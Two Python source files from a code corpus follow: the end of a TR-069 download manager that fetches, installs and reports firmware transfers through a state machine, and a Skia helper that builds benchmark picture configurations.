self.wait_handle = self.ioloop.add_timeout(
datetime.timedelta(seconds=when-now),
self.timer_callback)
def _new_download_object(self, stateobj):
url = getattr(stateobj, 'url', '')
username = getattr(stateobj, 'username', None)
password = getattr(stateobj, 'password', None)
o = urlparse.urlparse(url)
client = DOWNLOAD_CLIENT[o.scheme]
return client(url=url, username=username, password=password,
download_complete_cb=self.download_complete_callback,
download_dir=self.download_dir)
def _send_transfer_complete(self, faultcode, faultstring, start=0.0, end=0.0):
event_code = getattr(self.stateobj, 'event_code', 'M Download')
self.transfer_complete_cb(dl=self,
command_key=self.stateobj.command_key,
faultcode=faultcode,
faultstring=faultstring,
starttime=start, endtime=end,
event_code=event_code)
def state_machine(self, event, faultcode=0, faultstring='',
downloaded_file=None, must_reboot=False):
dlstate = self.stateobj.dlstate
if dlstate == self.START:
if event == self.EV_START or event == self.EV_REBOOT_COMPLETE:
self.stateobj.Update(dlstate=self.WAITING)
self._schedule_timer()
elif dlstate == self.WAITING:
if event == self.EV_TIMER:
self.download = self._new_download_object(self.stateobj)
self.stateobj.Update(dlstate=self.DOWNLOADING,
download_start_time=time.time())
self.download.fetch()
# TODO(dgentry) : need a timeout, in case download never finishes.
elif dlstate == self.DOWNLOADING:
if event == self.EV_DOWNLOAD_COMPLETE:
self.download = None # no longer needed
if faultcode == 0:
self.installer = INSTALLER(downloaded_file)
self.stateobj.Update(dlstate=self.INSTALLING)
file_type = getattr(self.stateobj, 'file_type', None)
target_filename = getattr(self.stateobj, 'target_filename', None)
self.installer.install(file_type=file_type,
target_filename=target_filename,
callback=self.installer_callback)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.INSTALLING:
if event == self.EV_INSTALL_COMPLETE:
if self.downloaded_file:
helpers.Unlink(self.downloaded_file)
if faultcode == 0:
if must_reboot:
self.stateobj.Update(dlstate=self.REBOOTING)
self.installer.reboot()
else:
end = time.time()
self.stateobj.Update(dlstate=self.EXITING,
download_complete_time=end)
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.REBOOTING:
if event == self.EV_REBOOT_COMPLETE:
# TODO(dgentry) check version, whether image was actually installed
end = time.time()
self.stateobj.Update(dlstate=self.EXITING, download_complete_time=end)
if faultcode == 0:
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.EXITING:
pass
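  # Happy-path event trace, summarizing the transitions implemented above:
  #   START --EV_START--> WAITING --EV_TIMER--> DOWNLOADING
  #     --EV_DOWNLOAD_COMPLETE(faultcode=0)--> INSTALLING
  #     --EV_INSTALL_COMPLETE(must_reboot=True)--> REBOOTING
  #     --EV_REBOOT_COMPLETE--> EXITING, where TransferComplete is sent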
def do_start(self):
return self.state_machine(self.EV_START)
def timer_callback(self):
"""Called by timer code when timeout expires."""
return self.state_machine(self.EV_TIMER)
def download_complete_callback(self, faultcode, faultstring, tmpfile):
print 'Download complete callback.'
name = tmpfile and tmpfile.name or None
self.downloaded_fileobj = tmpfile # keep this around or it auto-deletes
self.downloaded_file = name
return self.state_machine(self.EV_DOWNLOAD_COMPLETE,
faultcode, faultstring,
downloaded_file=name)
def installer_callback(self, faultcode, faultstring, must_reboot):
return self.state_machine(self.EV_INSTALL_COMPLETE, faultcode, faultstring,
must_reboot=must_reboot)
def reboot_callback(self, faultcode, faultstring):
return self.state_machine(self.EV_REBOOT_COMPLETE, faultcode, faultstring)
def cleanup(self):
"""Attempt to stop all activity and clean up resources.
Returns:
      None - successfully stopped and cleaned up
string - the reason download cannot be safely cancelled right now.
"""
dlstate = self.stateobj.dlstate
if dlstate == self.INSTALLING:
return 'Download is currently installing to flash'
if dlstate == self.REBOOTING:
return 'Download has been installed, awaiting reboot'
if self.wait_handle:
self.ioloop.remove_timeout(self.wait_handle)
self.wait_handle = None
if self.download:
self.download.close()
self.download = None
self.stateobj.Delete()
def get_queue_state(self):
"""Data needed for GetQueuedTransfers/GetAllQueuedTransfers RPC."""
q = collections.namedtuple(
'queued_transfer_struct',
('CommandKey State IsDownload FileType FileSize TargetFileName'))
q.CommandKey = self.stateobj.command_key
dlstate = self.stateobj.dlstate
if dlstate == self.START or dlstate == self.WAITING:
qstate = 1 # Not yet started
elif dlstate == self.EXITING:
qstate = 3 # Completed, finishing cleanup
else:
qstate = 2 # In progress
q.State = qstate
q.IsDownload = True
q.FileType = getattr(self.stateobj, 'file_type', None)
q.FileSize = getattr(self.stateobj, 'file_size', 0)
q.TargetFileName = getattr(self.stateobj, 'target_filename', '')
return q
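  # Illustration (values hypothetical): a transfer still in WAITING would
  # yield q.CommandKey='cmd1', q.State=1, q.IsDownload=True,
  # q.FileType='1 Firmware Upgrade Image', q.FileSize=0, q.TargetFileName=''.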
# Object to track an individual Download RPC. Unit tests can override this.
DOWNLOADOBJ = Download
class DownloadManager(object):
"""Manage Download requests from the ACS.
Each RPC gets a Download object, which runs a state machine to track
the progress of the operation. The DownloadManager allocates, manages
and deletes the active Download objects.
SPEC: http://www.broadband-forum.org/technical/download/TR-069_Amendment-3.pdf
"""
  # Maximum simultaneous downloads. tr-69 requires support for at least 3,
  # but this implementation currently limits itself to 1.
MAXDOWNLOADS = 1
def __init__(self, ioloop=None):
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self._downloads = list()
self._pending_complete = list()
self.config_dir = '/tmp/'
self.download_dir = '/tmp/'
# Function to send RPCs, to be filled in by parent object.
self.send_transfer_complete = None
def NewDownload(self, command_key=None, file_type=None, url=None,
username=None, password=None, file_size=0,
target_filename=None, delay_seconds=0):
"""Initiate a new download, handling a tr-69 Download RPC.
    Args:
      command_key, file_type, url, username, password, file_size,
        target_filename, delay_seconds: as defined in tr-69 Amendment 3
        (page 82 of $SPEC)
Raises:
core.ResourcesExceededError: too many simultaneous downloads
core.FileTransferProtocolError: Unsupported URL type, ex: ftp
Returns:
(code, starttime, endtime):
code = status to return (1 == send TransferComplete later, $SPEC pg 85)
starttime, endtime = two floating point numbers in seconds for the
StartTime and CompleteTime of the DownloadResponse.
"""
# TODO(dgentry) check free space?
if len(self._downloads) >= self.MAXDOWNLOADS:
faultstring = 'Max downloads (%d) reached.' % self.MAXDOWNLOADS
raise core.ResourcesExceededError(faultstring)
o = urlparse.urlparse(url)
if o.scheme not in DOWNLOAD_CLIENT:
raise core.FileTransferProtocolError(
'Unsupported URL scheme %s' % o.scheme)
kwargs = dict(command_key=command_key,
file_type=file_type,
url=url,
username=username,
password=password,
file_size=file_size,
target_filename=target_filename,
delay_seconds=delay_seconds,
event_code='M Download')
pobj = persistobj.PersistentObject(objdir=self.config_dir,
rootname=DNLDROOTNAME,
filename=None,
ignore_errors=True,
**kwargs)
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.do_start()
return (1, 0.0, 0.0)
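  # Hedged usage sketch (URL, directories, and callback are illustrative):
  #   dm = DownloadManager()
  #   dm.SetDirectories(config_dir='/config', download_dir='/user')
  #   dm.send_transfer_complete = my_rpc_sender  # hypothetical RPC hook
  #   (code, start, end) = dm.NewDownload(
  #       command_key='cmd1', file_type='1 Firmware Upgrade Image',
  #       url='http://acs.example.com/image.bin', delay_seconds=30)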
def TransferCompleteCallback(self, dl, command_key, faultcode, faultstring,
starttime, endtime, event_code):
self._downloads.remove(dl)
self._pending_complete.append(dl)
if self.send_transfer_complete:
self.send_transfer_complete(command_key, faultcode, faultstring,
starttime, endtime, event_code)
def RestoreDownloads(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=DNLDROOTNAME)
for pobj in pobjs:
if not hasattr(pobj, 'command_key'):
print 'Download Object %s has no command_key' % pobj.filename
pobj.Delete()
continue
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.reboot_callback(0, None)
def TransferCompleteResponseReceived(self):
dl = self._pending_complete.pop()
dl.cleanup()
def GetAllQueuedTransfers(self):
transfers = list()
for dl in self._downloads:
transfers.append(dl.get_queue_state())
for dl in self._pending_complete:
transfers.append(dl.get_queue_state())
return transfers
def CancelTransfer(self, command_key):
"""Cancel an in-progress transfer.
Args:
command_key: the command_key to cancel. There can be multiple transfers
with the same command_key. $SPEC says to attempt to cancel all of them,
return failure if any cannot be cancelled.
Raises:
core.CancelNotPermitted: download cannot be cancelled right now.
"""
for dl in self._downloads:
if dl.CommandKey() == command_key:
faultstring = dl.cleanup()
if faultstring:
raise core.CancelNotPermitted(faultstring)
else:
self._downloads.remove(dl)
for dl in self._pending_complete:
if dl.CommandKey() == command_key:
raise core.CancelNotPermitted(
'Installed, awaiting TransferCompleteResponse')
def _DelayedReboot(self):
installer = INSTALLER('')
installer.reboot()
def RestoreReboots(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=BOOTROOTNAME)
reboots = []
for pobj in pobjs:
if hasattr(pobj, 'command_key'):
reboots.append(('M Reboot', pobj.command_key))
else:
print 'Reboot object %s has no command_key' % pobj.filename
pobj.Delete()
return reboots
def Reboot(self, command_key):
"""Reboot the system."""
kwargs = dict(command_key=command_key)
pobj = persistobj.PersistentObject(objdir=self.config_dir, rootname=BOOTROOTNAME,
filename=None, **kwargs)
self.ioloop.add_callback(self._DelayedReboot)
def _MakeDirsIgnoreError(self, directory):
"""Make sure a directory exists."""
try:
os.makedirs(directory, 0755)
except OSError:
pass
def SetDirectories(self, config_dir, download_dir):
self.config_dir = os.path.join(config_dir, 'state')
self.download_dir = os.path.join(download_dir, 'dnld')
self._MakeDirsIgnoreError(self.config_dir)
self._MakeDirsIgnoreError(self.download_dir)
def main():
# Generate diagram for Download state machine
import subprocess #pylint: disable-msg=C6204
cmd = ['dot', '-Tpdf', '-odownloadStateMachine.pdf']
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
print p.communicate(input=graphviz)[0]
if __name__ == '__main__':
main()
| apache-2.0 |
guorendong/iridium-browser-ubuntu | third_party/skia/tools/bench_pictures_cfg_helper.py | 44 | 3148 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Helper functions to be used in bench_pictures.cfg. """
def Config(**kwargs):
config = {}
for key in kwargs:
config[key] = kwargs[key]
return config
def TileArgs(tile_x, tile_y, timeIndividualTiles=True):
config = {'mode': ['tile', str(tile_x), str(tile_y)]}
if timeIndividualTiles:
config['timeIndividualTiles'] = True
return config
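# Illustration: TileArgs(256, 256) returns
#   {'mode': ['tile', '256', '256'], 'timeIndividualTiles': True}
# and TiledBitmapConfig(256, 256), defined below, merges in config='8888'.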
def BitmapConfig(**kwargs):
return Config(config='8888', **kwargs)
def GPUConfig(**kwargs):
return Config(config='gpu', **kwargs)
def TiledBitmapConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return BitmapConfig(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def TiledGPUConfig(tile_x, tile_y, **kwargs):
return GPUConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def TiledConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return Config(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def ViewportBitmapConfig(viewport_x, viewport_y, **kwargs):
return BitmapConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportGPUConfig(viewport_x, viewport_y, **kwargs):
return GPUConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportRTreeConfig(viewport_x, viewport_y, **kwargs):
return RTreeConfig(mode='simple', viewport=[str(viewport_x), str(viewport_y)],
**kwargs)
def ViewportGridConfig(viewport_x, viewport_y, **kwargs):
return GridConfig(viewport_x, viewport_y, mode='simple',
viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def CopyTilesConfig(tile_x, tile_y, **kwargs):
return BitmapConfig(mode=['copyTile', str(tile_x), str(tile_y)], **kwargs)
def RecordConfig(**kwargs):
return BitmapConfig(mode='record', **kwargs)
def PlaybackCreationConfig(**kwargs):
return BitmapConfig(mode='playbackCreation', **kwargs)
def MultiThreadTileConfig(threads, tile_x, tile_y, **kwargs):
return TiledBitmapConfig(tile_x=tile_x, tile_y=tile_y,
timeIndividualTiles=False, multi=str(threads),
**kwargs)
def RTreeConfig(**kwargs):
return BitmapConfig(bbh='rtree', **kwargs)
def GridConfig(tile_x, tile_y, mode, **kwargs):
return BitmapConfig(mode=mode, bbh=['grid', str(tile_x), str(tile_y)],
**kwargs)
def RecordRTreeConfig(**kwargs):
return RTreeConfig(mode='record', **kwargs)
def PlaybackCreationRTreeConfig(**kwargs):
return RTreeConfig(mode='playbackCreation', **kwargs)
def TileRTreeConfig(tile_x, tile_y, **kwargs):
return RTreeConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def RecordGridConfig(tile_x, tile_y, **kwargs):
return GridConfig(tile_x=tile_x, tile_y=tile_y, mode='record', **kwargs)
def PlaybackCreationGridConfig(tile_x, tile_y, **kwargs):
  return GridConfig(tile_x, tile_y, mode='playbackCreation', **kwargs)
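# Hedged usage sketch: a bench_pictures.cfg file would combine these helpers
# into named lists of configs, e.g. (names and tile sizes illustrative):
#   configs = {
#       'default': [TiledBitmapConfig(256, 256), RecordConfig()],
#       'gpu': [TiledGPUConfig(256, 256)],
#   }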
| bsd-3-clause |